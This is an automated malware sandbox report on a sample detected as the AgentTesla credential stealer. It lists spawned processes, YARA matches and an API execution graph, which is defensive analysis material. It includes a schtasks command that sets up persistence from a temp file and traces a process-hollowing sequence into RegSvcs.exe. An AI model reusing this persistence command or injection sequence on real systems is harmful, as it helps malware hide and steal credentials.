                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff6616b0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:16
                                              Start time:15:08:22
                                              Start date:17/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp35EA.tmp"
                                              Imagebase:0x900000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:17
                                              Start time:15:08:22
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:18
                                              Start time:15:08:22
                                              Start date:17/04/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x770000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2533846228.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2533846228.0000000002B26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.2533846228.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                                Execution Graph

                                                Execution Coverage:11.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:5.1%
                                                Total number of Nodes:257
                                                Total number of Limit Nodes:10
                                                execution_graph 27022 70dfb3d 27023 70dfb43 27022->27023 27024 70dfd4c 27023->27024 27028 71b2831 27023->27028 27044 71b28a6 27023->27044 27061 71b2840 27023->27061 27029 71b2833 27028->27029 27037 71b2862 27029->27037 27077 71b2d08 27029->27077 27087 71b2d29 27029->27087 27092 71b2f69 27029->27092 27097 71b2d95 27029->27097 27111 71b2e3e 27029->27111 27116 71b2e5f 27029->27116 27124 71b2ddf 27029->27124 27139 71b3239 27029->27139 27144 71b2c99 27029->27144 27148 71b33fa 27029->27148 27153 71b2f84 27029->27153 27163 71b3442 27029->27163 27168 71b2ecf 27029->27168 27037->27024 27045 71b2834 27044->27045 27046 71b28a9 27044->27046 27047 71b33fa 2 API calls 27045->27047 27048 71b2c99 2 API calls 27045->27048 27049 71b3239 2 API calls 27045->27049 27050 71b2862 27045->27050 27051 71b2ddf 6 API calls 27045->27051 27052 71b2e5f 4 API calls 27045->27052 27053 71b2e3e 2 API calls 27045->27053 27054 71b2d95 4 API calls 27045->27054 27055 71b2f69 2 API calls 27045->27055 27056 71b2d29 2 API calls 27045->27056 27057 71b2d08 4 API calls 27045->27057 27058 71b2ecf 6 API calls 27045->27058 27059 71b3442 2 API calls 27045->27059 27060 71b2f84 4 API calls 27045->27060 27046->27024 27047->27050 27048->27050 27049->27050 27050->27024 27051->27050 27052->27050 27053->27050 27054->27050 27055->27050 27056->27050 27057->27050 27058->27050 27059->27050 27060->27050 27062 71b285a 27061->27062 27063 71b33fa 2 API calls 27062->27063 27064 71b2c99 2 API calls 27062->27064 27065 71b3239 2 API calls 27062->27065 27066 71b2ddf 6 API calls 27062->27066 27067 71b2e5f 4 API calls 27062->27067 27068 71b2e3e 2 API calls 27062->27068 27069 71b2d95 4 API calls 27062->27069 27070 71b2f69 2 API calls 27062->27070 27071 71b2d29 2 API calls 27062->27071 27072 71b2d08 4 API calls 27062->27072 27073 71b2ecf 6 API calls 27062->27073 27074 71b2862 27062->27074 27075 71b3442 2 API calls 27062->27075 27076 71b2f84 4 API calls 27062->27076 27063->27074 
27064->27074 27065->27074 27066->27074 27067->27074 27068->27074 27069->27074 27070->27074 27071->27074 27072->27074 27073->27074 27074->27024 27075->27074 27076->27074 27078 71b2d11 27077->27078 27079 71b2d47 27078->27079 27081 71b2e45 27078->27081 27182 70dee58 27079->27182 27186 70dee60 27079->27186 27080 71b353b 27190 70deff8 27081->27190 27194 70deff0 27081->27194 27082 71b2d62 27088 71b2d2f 27087->27088 27089 71b358f 27088->27089 27198 70de978 27088->27198 27202 70de970 27088->27202 27089->27037 27093 71b300b 27092->27093 27095 70deff8 WriteProcessMemory 27093->27095 27096 70deff0 WriteProcessMemory 27093->27096 27094 71b35c4 27095->27094 27096->27094 27098 71b3240 27097->27098 27099 71b2d11 27097->27099 27103 71b2d62 27098->27103 27109 70deff8 WriteProcessMemory 27098->27109 27110 70deff0 WriteProcessMemory 27098->27110 27100 71b2e45 27099->27100 27101 71b2d47 27099->27101 27105 70deff8 WriteProcessMemory 27100->27105 27106 70deff0 WriteProcessMemory 27100->27106 27107 70dee58 Wow64SetThreadContext 27101->27107 27108 70dee60 Wow64SetThreadContext 27101->27108 27102 71b353b 27104 71b3665 27105->27102 27106->27102 27107->27103 27108->27103 27109->27104 27110->27104 27112 71b2e44 27111->27112 27114 70deff8 WriteProcessMemory 27112->27114 27115 70deff0 WriteProcessMemory 27112->27115 27113 71b353b 27114->27113 27115->27113 27117 71b2e65 27116->27117 27118 71b2d40 27117->27118 27122 70dee58 Wow64SetThreadContext 27117->27122 27123 70dee60 Wow64SetThreadContext 27117->27123 27119 71b358f 27118->27119 27120 70de978 ResumeThread 27118->27120 27121 70de970 ResumeThread 27118->27121 27119->27037 27120->27118 27121->27118 27122->27118 27123->27118 27125 71b2def 27124->27125 27128 71b2d8f 27124->27128 27126 71b2d11 27125->27126 27206 70def30 27125->27206 27210 70def38 27125->27210 27127 71b31a4 27126->27127 27129 71b2d47 27126->27129 27130 71b2e45 27126->27130 27127->27037 27128->27128 27135 70dee58 Wow64SetThreadContext 27129->27135 27136 70dee60 Wow64SetThreadContext 
27129->27136 27137 70deff8 WriteProcessMemory 27130->27137 27138 70deff0 WriteProcessMemory 27130->27138 27131 71b353b 27132 71b2d62 27135->27132 27136->27132 27137->27131 27138->27131 27140 71b323f 27139->27140 27142 70deff8 WriteProcessMemory 27140->27142 27143 70deff0 WriteProcessMemory 27140->27143 27141 71b3665 27142->27141 27143->27141 27214 70df676 27144->27214 27218 70df680 27144->27218 27149 71b3400 27148->27149 27222 70df0e0 27149->27222 27226 70df0e8 27149->27226 27150 71b3423 27150->27037 27154 71b2d11 27153->27154 27155 71b2d47 27154->27155 27156 71b2e45 27154->27156 27157 71b2d62 27154->27157 27161 70dee58 Wow64SetThreadContext 27155->27161 27162 70dee60 Wow64SetThreadContext 27155->27162 27159 70deff8 WriteProcessMemory 27156->27159 27160 70deff0 WriteProcessMemory 27156->27160 27158 71b353b 27159->27158 27160->27158 27161->27157 27162->27157 27164 71b2d40 27163->27164 27165 71b358f 27164->27165 27166 70de978 ResumeThread 27164->27166 27167 70de970 ResumeThread 27164->27167 27165->27037 27166->27164 27167->27164 27169 71b2dec 27168->27169 27180 70def38 VirtualAllocEx 27169->27180 27181 70def30 VirtualAllocEx 27169->27181 27170 71b2d11 27171 71b31a4 27170->27171 27172 71b2d47 27170->27172 27173 71b2e45 27170->27173 27171->27037 27176 70dee58 Wow64SetThreadContext 27172->27176 27177 70dee60 Wow64SetThreadContext 27172->27177 27178 70deff8 WriteProcessMemory 27173->27178 27179 70deff0 WriteProcessMemory 27173->27179 27174 71b353b 27175 71b2d62 27176->27175 27177->27175 27178->27174 27179->27174 27180->27170 27181->27170 27183 70deea5 Wow64SetThreadContext 27182->27183 27185 70deeed 27183->27185 27185->27082 27187 70deea5 Wow64SetThreadContext 27186->27187 27189 70deeed 27187->27189 27189->27082 27191 70df040 WriteProcessMemory 27190->27191 27193 70df097 27191->27193 27193->27080 27195 70df040 WriteProcessMemory 27194->27195 27197 70df097 27195->27197 27197->27080 27199 70de9b8 ResumeThread 27198->27199 27201 70de9e9 27199->27201 27201->27088 27203 
70de9b8 ResumeThread 27202->27203 27205 70de9e9 27203->27205 27205->27088 27207 70def78 VirtualAllocEx 27206->27207 27209 70defb5 27207->27209 27209->27126 27211 70def78 VirtualAllocEx 27210->27211 27213 70defb5 27211->27213 27213->27126 27215 70df709 CreateProcessA 27214->27215 27217 70df8cb 27215->27217 27219 70df709 CreateProcessA 27218->27219 27221 70df8cb 27219->27221 27223 70df133 ReadProcessMemory 27222->27223 27225 70df177 27223->27225 27225->27150 27227 70df133 ReadProcessMemory 27226->27227 27229 70df177 27227->27229 27229->27150 27001 71b3bd8 27002 71b3d63 27001->27002 27003 71b3bfe 27001->27003 27003->27002 27006 71b3e58 PostMessageW 27003->27006 27008 71b3e53 PostMessageW 27003->27008 27007 71b3ec4 27006->27007 27007->27003 27009 71b3ec4 27008->27009 27009->27003 27012 11bd378 27013 11bd3be GetCurrentProcess 27012->27013 27015 11bd409 27013->27015 27016 11bd410 GetCurrentThread 27013->27016 27015->27016 27017 11bd44d GetCurrentProcess 27016->27017 27018 11bd446 27016->27018 27019 11bd483 GetCurrentThreadId 27017->27019 27018->27017 27021 11bd4dc 27019->27021 27230 11b4668 27231 11b4672 27230->27231 27235 11b4759 27230->27235 27240 11b4218 27231->27240 27233 11b468d 27236 11b477d 27235->27236 27244 11b4859 27236->27244 27248 11b4868 27236->27248 27241 11b4223 27240->27241 27256 11b5c4c 27241->27256 27243 11b6f8d 27243->27233 27246 11b488f 27244->27246 27245 11b496c 27245->27245 27246->27245 27252 11b44e0 27246->27252 27250 11b488f 27248->27250 27249 11b496c 27249->27249 27250->27249 27251 11b44e0 CreateActCtxA 27250->27251 27251->27249 27253 11b58f8 CreateActCtxA 27252->27253 27255 11b59bb 27253->27255 27257 11b5c57 27256->27257 27260 11b5c7c 27257->27260 27259 11b7035 27259->27243 27261 11b5c87 27260->27261 27264 11b5cac 27261->27264 27263 11b711a 27263->27259 27265 11b5cb7 27264->27265 27268 11b5cdc 27265->27268 27267 11b720d 27267->27263 27269 11b5ce7 27268->27269 27270 11b850b 27269->27270 27272 11babb8 27269->27272 27270->27267 27276 11babdf 
27272->27276 27281 11babf0 27272->27281 27273 11babce 27273->27270 27277 11babf0 27276->27277 27285 11bace8 27277->27285 27293 11bacd9 27277->27293 27278 11babff 27278->27273 27283 11bacd9 2 API calls 27281->27283 27284 11bace8 2 API calls 27281->27284 27282 11babff 27282->27273 27283->27282 27284->27282 27286 11bacf9 27285->27286 27287 11bad1c 27285->27287 27286->27287 27301 11baf71 27286->27301 27305 11baf80 27286->27305 27287->27278 27288 11bad14 27288->27287 27289 11baf20 GetModuleHandleW 27288->27289 27290 11baf4d 27289->27290 27290->27278 27294 11bacf9 27293->27294 27295 11bad1c 27293->27295 27294->27295 27299 11baf71 LoadLibraryExW 27294->27299 27300 11baf80 LoadLibraryExW 27294->27300 27295->27278 27296 11bad14 27296->27295 27297 11baf20 GetModuleHandleW 27296->27297 27298 11baf4d 27297->27298 27298->27278 27299->27296 27300->27296 27302 11baf94 27301->27302 27303 11bafb9 27302->27303 27309 11ba0a8 27302->27309 27303->27288 27306 11baf94 27305->27306 27307 11bafb9 27306->27307 27308 11ba0a8 LoadLibraryExW 27306->27308 27307->27288 27308->27307 27310 11bb160 LoadLibraryExW 27309->27310 27312 11bb1d9 27310->27312 27312->27303 27010 11bd5c0 DuplicateHandle 27011 11bd656 27010->27011 27313 11bce60 27315 11bce6d 27313->27315 27314 11bcea7 27315->27314 27317 11bb6c0 27315->27317 27318 11bb6cb 27317->27318 27319 11bdbb8 27318->27319 27321 11bcfc4 27318->27321 27322 11bcfcf 27321->27322 27323 11b5cdc 3 API calls 27322->27323 27324 11bdc27 27323->27324 27324->27319
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 296a40a3bac7b2483402b693190ccd16f2c6aff955496e38f9cf4f3be253429d
                                                • Instruction ID: e891f5f13a6b4187dae27955a4c3bef7d0ac4cb5ac7e72c30bce9b8fa37f19d9
                                                • Opcode Fuzzy Hash: 296a40a3bac7b2483402b693190ccd16f2c6aff955496e38f9cf4f3be253429d
                                                • Instruction Fuzzy Hash: 4A9128B0D1530DDBCB08CFA6E58499DFBB2EB8A301F20A519E416B7224DB749946CF14
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68fa676d81eaa3066b259bb0d570343a5baac7556c642c98b2790e161ee4fdee
                                                • Instruction ID: 23966823ddc07901e17f16b15d00b89641e2ac9c3823c88744f61e254346a841
                                                • Opcode Fuzzy Hash: 68fa676d81eaa3066b259bb0d570343a5baac7556c642c98b2790e161ee4fdee
                                                • Instruction Fuzzy Hash: 3F8100B4E14259DFCB04EFA9C880AEEFBB2FB89200F21961AD511A7254DB749912CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc383ca408c4d6d6be45cbaba47375a1ac677b07897b43eef9081c279280135e
                                                • Instruction ID: 730be6de9f1bda136c05f0a7c9ad94fcf83ac0c02abf3d043169d45ec4c2e66d
                                                • Opcode Fuzzy Hash: bc383ca408c4d6d6be45cbaba47375a1ac677b07897b43eef9081c279280135e
                                                • Instruction Fuzzy Hash: EC8112B4E14259CFCB04EFA9C880AEEBBB2FF89200F10995AD511E7254DB789912CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 125e17916265c620b893e1f77b63dbb29eb293e80bf363d5ed04ed9e4e3957fd
                                                • Instruction ID: 498c511ee0487e7548ff63a18eb4e5d5839b2ad0aad85facaad228bdaa5f18db
                                                • Opcode Fuzzy Hash: 125e17916265c620b893e1f77b63dbb29eb293e80bf363d5ed04ed9e4e3957fd
                                                • Instruction Fuzzy Hash: 97412CB5908218DFCB65CF64C894BECBBB9FB4E300F5190DAD419A7291C7319A99CF00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 371327b60d0da769f40c80396b4543d55090167c2ff3c765c0f5a92257337ce7
                                                • Instruction ID: e35cae1b1734cfeb0d57f9a1d15e8f4fb1aa76a2c3356f1b330b4692cc12b0cc
                                                • Opcode Fuzzy Hash: 371327b60d0da769f40c80396b4543d55090167c2ff3c765c0f5a92257337ce7
                                                • Instruction Fuzzy Hash: BD21C4B1D056189BEB19CFAAC8447DEBBB6AFC9300F04C16A9408A6254DB7419458FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 72da0eae3e6b681268aa9b2a268a983df6fa6c5dba112e9a7c8e786ba7201247
                                                • Instruction ID: 7b847d18d6828ce851df118bca89274038a56b7fede015491c3d46506f23e08f
                                                • Opcode Fuzzy Hash: 72da0eae3e6b681268aa9b2a268a983df6fa6c5dba112e9a7c8e786ba7201247
                                                • Instruction Fuzzy Hash: A521E2B1D107189BEB18CFABC9447DEFAF7AFC9300F14C16AD418A6268DB7419468F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 63734c6dd6572685ec0e22d8398e5177762f577330335a7773878c7e1bf6c219
                                                • Instruction ID: 2187f63f70210d187822fd56fb5b272e18f105e7512492a586b81847dfe91e57
                                                • Opcode Fuzzy Hash: 63734c6dd6572685ec0e22d8398e5177762f577330335a7773878c7e1bf6c219
                                                • Instruction Fuzzy Hash: 8FE086B4D1C104DFC3545F30548C5F5BBB9AF0F302F0A11A5D40A97642E73095118E19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362943300.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_71b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a791f7b00bf0b9ef4165dad3a14e7252a3e780fd3bb5d3969a7fb39628716a81
                                                • Instruction ID: 681cc276e3ccd714550c7145a6cac6df0ca0f8e6645ff9852be458c3e7dd79de
                                                • Opcode Fuzzy Hash: a791f7b00bf0b9ef4165dad3a14e7252a3e780fd3bb5d3969a7fb39628716a81
                                                • Instruction Fuzzy Hash: 3BE0ECB481D248DFC729DF64D4949F8BBB8EB4F300F02609AC90A97296D731AA54CE05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 011BD3F6
                                                • GetCurrentThread.KERNEL32 ref: 011BD433
                                                • GetCurrentProcess.KERNEL32 ref: 011BD470
                                                • GetCurrentThreadId.KERNEL32 ref: 011BD4C9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 6101aa70b72123a5a79d1a173627791e9200b640a1625d3894945a8f59343c6e
                                                • Instruction ID: 9846f623f1185bd067352181471e9f75264730e52874b25c20d87f71b6a1f079
                                                • Opcode Fuzzy Hash: 6101aa70b72123a5a79d1a173627791e9200b640a1625d3894945a8f59343c6e
                                                • Instruction Fuzzy Hash: F65166B09007498FDB18CFAAD589BDEBBF1EF88308F208459E009A7390D7786945CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 21 70df676-70df715 23 70df74e-70df76e 21->23 24 70df717-70df721 21->24 31 70df7a7-70df7d6 23->31 32 70df770-70df77a 23->32 24->23 25 70df723-70df725 24->25 26 70df748-70df74b 25->26 27 70df727-70df731 25->27 26->23 29 70df735-70df744 27->29 30 70df733 27->30 29->29 33 70df746 29->33 30->29 40 70df80f-70df8c9 CreateProcessA 31->40 41 70df7d8-70df7e2 31->41 32->31 34 70df77c-70df77e 32->34 33->26 35 70df7a1-70df7a4 34->35 36 70df780-70df78a 34->36 35->31 38 70df78c 36->38 39 70df78e-70df79d 36->39 38->39 39->39 42 70df79f 39->42 52 70df8cb-70df8d1 40->52 53 70df8d2-70df958 40->53 41->40 43 70df7e4-70df7e6 41->43 42->35 45 70df809-70df80c 43->45 46 70df7e8-70df7f2 43->46 45->40 47 70df7f4 46->47 48 70df7f6-70df805 46->48 47->48 48->48 50 70df807 48->50 50->45 52->53 63 70df968-70df96c 53->63 64 70df95a-70df95e 53->64 66 70df97c-70df980 63->66 67 70df96e-70df972 63->67 64->63 65 70df960 64->65 65->63 68 70df990-70df994 66->68 69 70df982-70df986 66->69 67->66 70 70df974 67->70 72 70df9a6-70df9ad 68->72 73 70df996-70df99c 68->73 69->68 71 70df988 69->71 70->66 71->68 74 70df9af-70df9be 72->74 75 70df9c4 72->75 73->72 74->75 77 70df9c5 75->77 77->77
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070DF8B6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 183260d983c97ebd38fc336894c89c0e1acef99bec11b14825a521cbd88e3ac6
                                                • Instruction ID: 260f392500d531085d6c246a1ee1da34cd82c2fc4c978adb87e95bdc3a5a4f2c
                                                • Opcode Fuzzy Hash: 183260d983c97ebd38fc336894c89c0e1acef99bec11b14825a521cbd88e3ac6
                                                • Instruction Fuzzy Hash: C7A139B1D0031A9FEB64DF68C8417EDBBB2BF48310F148669E859A7240DB74A985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 78 70df680-70df715 80 70df74e-70df76e 78->80 81 70df717-70df721 78->81 88 70df7a7-70df7d6 80->88 89 70df770-70df77a 80->89 81->80 82 70df723-70df725 81->82 83 70df748-70df74b 82->83 84 70df727-70df731 82->84 83->80 86 70df735-70df744 84->86 87 70df733 84->87 86->86 90 70df746 86->90 87->86 97 70df80f-70df8c9 CreateProcessA 88->97 98 70df7d8-70df7e2 88->98 89->88 91 70df77c-70df77e 89->91 90->83 92 70df7a1-70df7a4 91->92 93 70df780-70df78a 91->93 92->88 95 70df78c 93->95 96 70df78e-70df79d 93->96 95->96 96->96 99 70df79f 96->99 109 70df8cb-70df8d1 97->109 110 70df8d2-70df958 97->110 98->97 100 70df7e4-70df7e6 98->100 99->92 102 70df809-70df80c 100->102 103 70df7e8-70df7f2 100->103 102->97 104 70df7f4 103->104 105 70df7f6-70df805 103->105 104->105 105->105 107 70df807 105->107 107->102 109->110 120 70df968-70df96c 110->120 121 70df95a-70df95e 110->121 123 70df97c-70df980 120->123 124 70df96e-70df972 120->124 121->120 122 70df960 121->122 122->120 125 70df990-70df994 123->125 126 70df982-70df986 123->126 124->123 127 70df974 124->127 129 70df9a6-70df9ad 125->129 130 70df996-70df99c 125->130 126->125 128 70df988 126->128 127->123 128->125 131 70df9af-70df9be 129->131 132 70df9c4 129->132 130->129 131->132 134 70df9c5 132->134 134->134
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070DF8B6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: f26454ac8866447af65762ef72dbdd461598abd6af0260d430f9a9d63fbf61de
                                                • Instruction ID: ae8d3fee8ff727dadbb4fdc401f76dcb43d024c038e26342009c9c16ee2a9706
                                                • Opcode Fuzzy Hash: f26454ac8866447af65762ef72dbdd461598abd6af0260d430f9a9d63fbf61de
                                                • Instruction Fuzzy Hash: 8C9139B1D0031A9FEB64DF68C841BDDBBF2BF48310F148669E819A7240DB74A985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 11bace8 (calls GetModuleHandleW); graph rendering not reproduced
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAF3E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 4b56f2a8d6c9b214c900f52a5178bbe4d9db4f57f9db01c428417a41889d3140
                                                • Instruction ID: 267109c0b929076d2e32600f684816129e48a534e871a1fd33baccf8abd5c415
                                                • Opcode Fuzzy Hash: 4b56f2a8d6c9b214c900f52a5178bbe4d9db4f57f9db01c428417a41889d3140
                                                • Instruction Fuzzy Hash: AB713870A00B058FE728DF29E49479ABBF1FF88304F008A2DE58AD7A50D775E945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 11b58ec (calls CreateActCtxA); graph rendering not reproduced
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 011B59A9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 4043057e127d9fb5489fe7e43cc9fc6bd38db3b69b7d7de9f6bd5111ecde633e
                                                • Instruction ID: 2de957149bb3d18869e779ad9fbfe87c7ae5d9cce3abc1d70634ea542072cc1d
                                                • Opcode Fuzzy Hash: 4043057e127d9fb5489fe7e43cc9fc6bd38db3b69b7d7de9f6bd5111ecde633e
                                                • Instruction Fuzzy Hash: 6441C2B0C00719CFEB24DFA9C884BDDBBB6BF49304F24816AD409AB251D7756946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 11b44e0 (calls CreateActCtxA); graph rendering not reproduced
                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 011B59A9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1356142048.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_11b0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: ce8f66364b58fc963fabe6f7198f0be64c1ca6a75361c0333d6b17c5095fc47f
                                                • Instruction ID: a3e17d347aa1112397f9b763b1d4a96675abcd450e38af1a4b4a1ad0878be640
                                                • Opcode Fuzzy Hash: ce8f66364b58fc963fabe6f7198f0be64c1ca6a75361c0333d6b17c5095fc47f
                                                • Instruction Fuzzy Hash: 4A41C570C00719CBEB64DFA9C884BDEBBB6BF49304F24806AD419AB251D7756946CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph: function at 70deff0 (calls WriteProcessMemory); graph rendering not reproduced
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070DF088
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1362769215.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_70d0000_DOCUMENTS.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
